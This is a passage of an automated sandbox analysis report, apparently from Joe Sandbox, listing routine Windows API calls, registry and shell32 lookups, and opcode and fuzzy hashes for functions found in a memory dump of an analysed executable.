                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                                                                                                                                    • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                                                                                                                                                    • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                                                                                                                                                  • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 3869789854-2936008475
                                                                                                                                                                                                                                  • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                                                                                                                  • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452908 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                  • String ID: T$H
                                                                                                                                                                                                                                  • API String ID: 2018770650-488339322
                                                                                                                                                                                                                                  • Opcode ID: 8e20ab251d088d0bfaf69feb7d17608973a6f06366ba1158c9466a0d895ab982
                                                                                                                                                                                                                                  • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e20ab251d088d0bfaf69feb7d17608973a6f06366ba1158c9466a0d895ab982
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047C5D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                  • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                                                                                                                  • API String ID: 3535843008-1113070880
                                                                                                                                                                                                                                  • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                                                                                                                                  • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047524C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                                                                                                                                                    • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                  • String ID: CreateFile
                                                                                                                                                                                                                                  • API String ID: 2528220319-823142352
                                                                                                                                                                                                                                  • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                                                                                                                                  • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042DE1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                  • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                                                                                                                                                  • API String ID: 71445658-2565060666
                                                                                                                                                                                                                                  • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                                                                                                                                  • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004570B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                                                                                                                                  • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 2906209438-2320870614
                                                                                                                                                                                                                                  • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                                                                                                                                  • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046CDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                                                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 2492108670-2683653824
                                                                                                                                                                                                                                  • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                                                                                                                  • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044852C Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                                                  • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                                                                                                                                  • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00481C7C Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Append$System
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1489644407-0
                                                                                                                                                                                                                                  • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                                                                                                                                  • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004243FC Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0042448F
                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 00424499
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                                                                                                  • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                                                                                                                                                  • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416644 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                                                                                                                                                                  • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Prop$Window
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3363284559-0
                                                                                                                                                                                                                                  • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                                                                                                                                                  • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EE54 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
